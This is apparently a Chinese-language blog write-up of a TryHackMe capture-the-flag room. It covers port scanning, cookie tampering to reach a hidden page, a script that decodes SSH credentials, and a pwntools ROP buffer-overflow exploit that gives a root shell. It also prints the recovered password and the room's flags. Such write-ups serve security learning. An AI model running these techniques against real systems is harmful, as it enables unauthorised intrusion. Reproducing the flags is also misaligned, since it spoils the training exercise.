打靶记录(五五)之THMAnonymousPlayground

端口扫描

sudo nmap --min-rate 10000 -p- 10.10.110.6 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 20:50 CST
Nmap scan report for 10.10.110.6
Host is up (0.24s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 11.50 seconds

扫了好几次才扫出来。。。

sudo nmap -sT -sV -sC -O -p22,80 10.10.110.6  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-26 20:51 CST
Nmap scan report for 10.10.110.6
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
|   256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_  256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
| http-robots.txt: 1 disallowed entry 
|_/zYdHuAKjP
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 3.10 (93%), Linux 5.4 (93%), Adtran 424RG FTTH gateway (92%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (91%), Linux 2.6.18 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds

大概率是要从Web服务入手了

Web

默认页一个嗨客页面，查看源码，发现一个/upcoming.php

然后发现cookies里面有个access但是我们现在是 denied

operatives（技术工人）见面里一堆人名，先保存下来

robots.txt里面有个目录：/zYdHuAKjP

但是发现没有权限。。。搜索了一下，denied的反义词是granted，更改cookies，刷新界面

得到

hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN

看上去像是凭证？

根据房间提示,”zA”要变成”a”

hEadCfHa::hEadCfHahAiJaeIaDjBcBhHgAafHfN

但是试了一下不能SSH登录,显然这个凭证看上去有点奇怪。如果z是26，A是1,那a就是27？？

那hE就可以理解为8+5=13?那就是m?也确实发现都是小写和大写字母一组

懒得自己写了，贴个别人的脚本（心虚

encoded = "hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN"
all_alpha = "" # String of all lowercase english alphabets

for i in range(ord('a'),ord('z')+1):
	all_alpha += chr(i)

print("Encoded => " + encoded)
print("All alphabets => " + all_alpha)
print("Decoded => ",end="")

# This loop iterates over all PAIRS of the alphabets, ignoring the '::'

for i in range(0,len(encoded),2):
	first_char = encoded[i] # Since the first char in all pairs is lowercase
	second_char = encoded[i+1].lower() # Since the second char in all pairs is uppercase
	

	if first_char == ':':
		print(":",end="")
		continue
	
	first_alpha_position = ord(first_char) - ord('a') + 1 
	second_alpha_position = ord(second_char) - ord('a') + 1 
	
	decoded_alpha_position = (first_alpha_position + second_alpha_position) % 26 # The modulo operation takes care of the "imagine the list of alphabets arranged in a circular loop" part I was talking about
	
	decoded_alpha = all_alpha[decoded_alpha_position - 1] # Array indexes start at 0, yes?
	print(decoded_alpha,end="")

print("")

得到：magna:magnaisanelephant

而且我们之前搜集到的user里面也是有magna这个用户的，SSH登录

flag1

9184177ecaa83073cbbf36f1414cc029

提权

发现还有一个spooky用户，而且有他留下的纸条，让我破解这个二进制文件

scp magna@10.10.110.6:/home/magna/hacktheworld .

放IDA里看一下，有一个gets，应该有bufferflow

from pwn import *
import sys

# Checking argument

if len(sys.argv) != 2:
	print("Usage: " + sys.argv[0] + " target")
	exit(0)

# Getting argument

target = sys.argv[1]

# Establishing ssh session

ssh_session = ssh('magna',target,password='magnaisanelephant')
info("Opening ./hacktheworld")
proc = ssh_session.process('./hacktheworld')

# Preparing the payload

junk = b"A"*72 # Just some junk
pop_ret = p64(0x00400773) # POP RDI; RET gadget
zero = p64(0x0) # 0x00000000 to 'push' on to stack
setuid = p64(0x004006c4) # setuid() call in call_bash

payload = junk + pop_ret + zero + setuid

# Getting root shell

proc.recvrepeat(0.1) # Receives the "Who do you want to hacK? " line
proc.sendline(payload) # Sends the payload
proc.interactive() # Gets an interactive shell

放IDA里反编译一下，存在一个call_bash的后门函数

python exp.py ip

已经是ROOT了

spooky flag

69ee352fb139c9d0699f6f399b63d9d7

root.txt

bc55a426e98deb673beabda50f24ce66

碎碎念

实际上就是写两个脚本就能完成的房间，PWN部分还不是很熟悉